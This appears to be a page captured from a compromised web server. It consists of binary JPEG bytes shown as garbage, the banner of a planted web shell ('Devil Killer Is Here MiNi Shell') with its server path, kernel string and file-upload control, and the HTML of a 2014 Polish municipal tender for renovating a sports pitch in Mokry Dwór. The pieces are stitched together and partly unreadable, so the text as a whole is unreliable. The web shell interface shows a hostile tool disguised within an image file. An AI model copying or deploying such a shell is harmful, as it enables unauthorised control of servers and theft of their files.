JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140822/279686-N-2014.html

<p class="kh_header"><b>Siechnice: Remont i modernizacja boiska sportowego na
działce rekreacyjnej nr 246/27 w miejscowości Mokry Dwór</b><br>
<b>Numer ogłoszenia: 279686 - 2014; data zamieszczenia: 22.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i modernizacja boiska sportowego na
działce rekreacyjnej nr 246/27 w miejscowości Mokry Dwór.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
remont i modernizacja boiska sportowego na działce rekreacyjnej nr 246/27 w miejscowości Mokry Dwór.
Zakres robót obejmuje: 1)wytyczenie projektowany kształt boiska, z części porośniętej trawą usunąć
warstwę humusu 2)splantowanie istniejącego podłoża i dogęszczenie dynamicznie walcem okołkowanym
3)odziarnienie podłoża kruszywem łamanym 0/31 4)obramowania boiska obrzeżem betonowym 8/30 5)
wykonanie warstwy wzmocnionego podłoża w formie stabilizacji Rm=2.5 MPa 6)wykonanie podbudowy
zasadniczej z kruszywa łamanego 0/31 stabilizowanego mechanicznie 7)wykonanie warstwy
nawierzchniowej poliuretanowej wraz z podbudową elastyczną systemową 8)wykonanie malowania linii
boisk farbami chlorokauczukowymi do nawierzchni poliuretanowych 9)montaż wyposażenia sportowego
dostarczonego przez Inwestora: zestaw do koszykówki (z demontażu, w tym konserwacja, czyszczenie i
zabezpieczenie antykorozyjne elementów stalowych) oraz zestawu do siatkówki (elementy zakupione
przez Inwestora - nieużywane, słupki aluminiowe montowane w tulejach) 10)wykonanie rekultywacji terenu
wokół boiska z obsianiem trawą 11)malowanie linii boisk do siatkówki, koszykówki i tenisa 12)niwelacja i ukształtowanie terenu tak, aby zapewnić powierzchniowy odpływ wód opadowych z nawierzchni boiska 13)
rekultywacja terenu i wysiew trawy wokół boiska Wykonanie nawierzchni sportowej elastycznej
przepuszczalnej dla wody obejmuje: 1)warstwa użytkowa jednowarstwowa - system poliuretanowy z
granulatu EPDM i lepiszcza poliuretanowego wykonywana rozkładarką - gr. 10 mm. Kolor nawierzchni -
ceglastoczerwony 2)warstwa nośna - mieszanina granulatu gumowego, kruszywa i lepiszcza
poliuretanowego układana mechanicznie, bezspoinowo, przy pomocy rozkładarki mas poliuretanowych - gr.
35 mm Nawierzchnia boiska obramowana, betonowym obrzeżem chodnikowym o wym. 8/30 ustawionym
na ławie z betonu C12/15. Górna krawędź obrzeża zlicowana z nawierzchnią płyty boiska. Od strony
granicy działki obrzeże należy usytuować przed istniejącymi słupkami ogrodzenia wysokiego,
uwzględniając szerokość stopy fundamentowej słupka (wymiar stopy ok.0,5x0,5m). Pod istniejącym
ogrodzeniem, na długości boiska (31.0 m), należy wykonać dodatkowe obrzeże wyniesione 5 cm nad
projektowany teren. Obrzeże ma być wykonane w osi istniejącego ogrodzenia pod siatką (wzdłuż granicy
działki 246/27 i 247/2 i 247/1) Na tej długości należy wykonać skarpę o wys. ok. 0,5m, w celu niwelacji
poziomu terenu na sąsiedniej działce. Zamawiający nie dopuszcza składania ofert częściowych. Oferty nie
zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone. Każdy wykonawca ma prawo
zapoznać się z zakresem prac w terenie, zgodnie ze SIWZ wraz z załącznikami. Zamawiający zaleca, aby
Wykonawca dokonał wizji lokalnej miejsca realizacji zamówienia, zapoznał się z warunkami lokalnoterenowymi
planowanych robot budowlanych, aby uzyskać informacje, które mogą być konieczne do
przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej
poniesie Wykonawca. Zdjęcia stanu istniejącego stanowią załącznik nr 13 do specyfikacji istotnych
warunków zamówienia. Przedmiot zamówienia obejmuje zakres przedstawiony w następujących
dokumentach podanych kolejno w hierarchii ich ważności: 1)Specyfikacja Istotnych Warunków Zamówienia
wraz z załącznikami, 2)dokumentacja projektowa - projekt wykonawczy - opracowana przez arch. inż.
Małgorzatę Szurek i arch. inż. Danutę Michalską-Szczepańską, stanowiąca załącznik nr 11 do specyfikacji
istotnych warunków zamówienia, 3)specyfikacja techniczna wykonania i odbioru robót, stanowiącą część
dokumentacji projektowej. Dokumentacja projektowa w wersji papierowej dostępna jest do wglądu w
Urzędzie Miejskim w Siechnicach pok.204, II piętro w godz. 8.00 - 14.00. Istnieje możliwość zamówienia
kopii dokumentacji projektowej (w ciągu 7 dni od złożenia zamówienia) lub możliwość udostępnienia
dokumentacji w celu wykonania kopii we własnym zakresie. Dokumentację do skopiowania wypożycza się
w godz. 15.00 - 15.30. Jej zwrot następuje następnego dnia do godz. 9.00 Tam, gdzie w SIWZ i
dołączonych do niej załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót
budowlanych, projekty, przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent,
dostawca itp.) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3
ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem,
że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych
dokumentach. Przedmiot zamówienie musi zostać wykonany zgodnie z dokumentacja projektową i zasadami wiedzy technicznej, a Wykonawca zobowiązany jest do wykonania wszelkich prac niezbędnych
do osiągnięcia zakładanego rezultatu, tj. wykonanie podbudowy, nawierzchni i montaż wyposażenia na
istniejącym boisku sportowym będącym przedmiotem zamówienia. Wykonawca zobowiązany będzie
wykonać przedmiot zamówienia: a)z materiałów własnych tj. wyrobów dopuszczonych do stosowania w
budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2010 r. Nr
243 poz. 1623 z późn. zm.) oraz ustawy z dnia 16 kwiecień 2004 r. o wyrobach budowlanych (Dz. U. Nr 92
poz. 881 z późn. zm.); b)zgodnie z postanowieniami niniejszej SIWZ, zapisami złożonej oferty,
dokumentacją i wymaganiami wynikającymi z obowiązujących przepisów prawa, standardów i norm oraz
etyką zawodową i ustalonymi zwyczajami, siłami własnymi lub w systemie generalnego wykonawstwa.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 Prawo zamówień publicznych przewiduje możliwość
udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia
podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-0, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu nie jest obowiązany wnieść
wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisane oświadczenia o
spełnieniu warunków w niniejszym postępowaniu zgodnie z wzorem zamieszczonym w
załączniku nr 2 do specyfikacji istotnych warunków zamówienia - Oświadczenie o spełnieniu
warunków udziału w postępowaniu. W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone przez każdego wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz
wykonanych w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres
prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie
wykonawca zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych
robót budowlanych oraz załączy dowody dotyczące najważniejszych robót, określających, czy te
roboty zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi załącznik nr 6 do
specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu
ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są: 1)
poświadczenie lub 2)jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie
jest w stanie uzyskać stosownego poświadczenia, oświadczenie wykonawcy. W przypadku, gdy
Zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie zostały
wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w
punkcie 1) i 2). Wykonawca zobowiązany jest do wskazania w ww. wykazie usługi
niewykonanych lub wykonanych nienależycie. 2. W celu zweryfikowania rzetelności, kwalifikacji,
efektywności i doświadczenia Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej,
wskazać roboty budowlane, wykonane w okresie ostatnich 5 lat przed upływem terminu
składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadające
w swoim zakresie robotom budowlanym stanowiącym przedmiot zamówienia (w zakresie
technologii wykonania obiektu będącego przedmiotem zamówienia), wraz z podaniem ich
wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów
potwierdzających, że te roboty budowlane zostały wykonane należycie oraz wskazujące, że
zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone tj.: co najmniej
2 zadań, polegających na wykonaniu robót budowlanych w zakresie wykonania boiska
sportowego wielofunkcyjnego o nawierzchni sportowej poliuretanowej przepuszczalnej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca
zobowiązany jest w wykazie, o którym mowa powyżej, wskazać roboty budowlane, wykonane w
okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia
działalności jest krótszy w tym okresie, odpowiadające w swoim zakresie robotom budowlanym
stanowiącym przedmiot zamówienia (w zakresie technologii wykonania obiektu będącego
przedmiotem zamówienia), wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,
oraz załączenia dokumentów potwierdzających, że te roboty budowlane zostały wykonane
należycie oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i
prawidłowo ukończone tj.: co najmniej 2 zadań, polegających na wykonaniu robót budowlanych w
zakresie wykonania boiska sportowego wielofunkcyjnego o nawierzchni sportowej poliuretanowej
przepuszczalnej;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełnionego druku oferty - zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ - wzór oferty.
Cena zawarta w ofercie musi uwzględniać wszystkie prace wynikające z niniejszej specyfikacji istotnych
warunków zamówienia, dokumentacji technicznej jak i z zalecanej wizji w terenie. 2)Oświadczenie, że
zastosowane przez Wykonawcę przy realizacji zadania materiały będą posiadały właściwości użytkowe
wymagane przy tego typu robotach, a także będą posiadały ważne atesty, aprobaty techniczne i deklaracje
zgodności dopuszczające do stosowania, które na każde żądanie Zamawiającego zostaną niezwłocznie
dostarczone - załącznik nr 4 do specyfikacji istotnych warunków zamówienia 3)oświadczenie o
zaakceptowaniu stawek i narzutów do negocjacji wyceny robót dodatkowych i/lub uzupełniających i/lub
zaniechanych - załącznik nr 10 do specyfikacji istotnych warunków zamówienia. W przypadku składania
oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie
musi być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy. 4)pełnomocnictwo dla
podmiotów występujących wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z
art. 23 ustawy Prawo zamówień publicznych. W razie wyboru oferty podmiotów występujących wspólnie,
Zamawiający zażąda przed zawarciem umowy - stosownie do art. 23 ust. 4 - umowy regulującej
współpracę tych podmiotów. Oferta konsorcjum musi spełniać następujące wymagania - zawierać odrębne
i niezależne dla każdego uczestnika konsorcjum wszystkie dokumenty i oświadczenia wymienione powyżej, podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony - to znaczy podpisana
przez przedstawiciela konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego
pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli członków konsorcjum 5)
pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba
nie wykazana w rejestrze 6) dowody dotyczące najważniejszych robót, określających, czy roboty te zostały
wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki
budowlanej i prawidłowo ukończone. Dowodami, o których mowa powyżej są: a)poświadczenie lub b)jeżeli
z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać stosownego
poświadczenia, inne dokumenty. W tym wypadku wykonawca zobowiązany jest do udowodnienia
Zamawiającemu, że okoliczności powodujące brak poświadczenia w sposób oczywisty i logiczny
potwierdzają niemożność przedłożenia poświadczenia, a także okoliczności te nie mogą leżeć po stronie
wykonawcy. W przypadku, gdy zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane
w wykazie, o którym mowa w pkt. 2, zostały wcześniej wykonane, wykonawca nie ma obowiązku
przedkładania dowodów, o których mowa w niniejszym punkcie. Wykonawca zobowiązany jest do
wskazania w ww. wykazie usługi niewykonanych lub wykonanych nienależycie. 7) Jeśli Wykonawca polega
na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do
realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia. Jednocześnie poleganie Wykonawcy na wiedzy i doświadczeniu innych podmiotów
nierozerwalnie wiąże się z tym, że podmioty te będą brały udział w realizacji zamówienia, a Wykonawca
przedstawi pisemne zobowiązanie tych podmiotów do udziału w realizacji udzielonego zamówienia. Wzory
oświadczeń stanowią odpowiednio załączniki nr 7 do specyfikacji istotnych warunków zamówienia. 8)
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 5.2 SIWZ, polega na zasobach
innych podmiotów na zasadach określonych w pkt 6.2 SIWZ oraz w art. 26 ust. 2b ustawy Prawo zamówień
publicznych, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów
w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący
Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga złożenia w ofercie:
a)pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów
na okres korzystania z nich przy wykonywaniu zamówienia w postaci oświadczeń lub innych dokumentów
zawierających powyższe zobowiązania (oryginały), b)oświadczenia Wykonawcy o charakterze stosunków,
jakie będą łączyły Wykonawcę z podmiotami, o których mowa powyżej; c)oświadczenia Wykonawcy o
zakresie i okresie udziału podmiotów, o których mowa powyżej przy wykonywaniu zamówienia;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której istotne postanowienia
stanowi załącznik do niniejszej umowy. W zawiadomieniu o wyborze najkorzystniejszej oferty zostanie
określony termin podpisania umowy. 2.Zamawiający dopuszcza nieistotne zmiany w umowie oraz inne
zmiany postanowień zawartych w istotnych postanowieniach umowy, które Zamawiający przewidział w
ogłoszeniu lub specyfikacji istotnych warunków zamówienia. 3. Zamawiający dopuszcza możliwość
przerwania świadczenia prac nie z winy Wykonawcy, których nie można było przewidzieć lub którym
skutkom nie można było zapobiec, pomimo dołożenia przez Wykonawcę najwyższej staranności (np.:
klęska żywiołowa i inne). Zamawiający dopuszcza zmianę terminu realizacji umowy w przypadku
wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu
określonego w Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych
okoliczności. 4.Zamawiający dopuszcza możliwość zmiany sposobu rozliczania umowy lub dokonywania
płatności. 5.Zamawiający dopuszcza możliwość zmiany stawki podatku VAT w przypadku zmiany
przepisów dotyczących podatku VAT. 6.Zamawiający dopuszcza zmianę przedstawicieli stron umowy.
7.Zamawiający może zażądać od wykonawcy zmiany osób odpowiedzialnych bezpośrednio za realizację
zamówienia, jeżeli uzna, że nie wykonują one swoich obowiązków wynikających z umowy. Wykonawca
zobowiązany jest zmienić te osoby zgodnie z żądaniem Zamawiającego we wskazanym przez
Zamawiającego terminie. 8.Dopuszcza się zmiany na skutek wydanych decyzji, uzgodnień, faktycznych
uwarunkowań terenowych i gruntowych, powodujących konieczność modyfikacji rozwiązań, z
zastrzeżeniem. 9.Innych sytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających
charakter zmian nieistotnych tj. nie odnoszących się do kwestii, które podlegały ocenie podczas wyboru
Wykonawcy i takich, które gdyby były znane w momencie wszczęcia procedury mającej na celu wybór
Wykonawcy, nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tą procedurą.
10.Zamawiający dopuszcza zmianę terminu realizacji umowy lub poszczególnych jej części o czas trwania
poniższych okoliczności, w przypadku: 1)wystąpienia okoliczności niezależnych od Wykonawcy
skutkujących niemożliwością dotrzymania terminu określonego w Umowie, termin ten może ulec
przedłużeniu, 2)konieczności wprowadzenia zmian w dokumentacji projektowej, a wynikających z
konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie
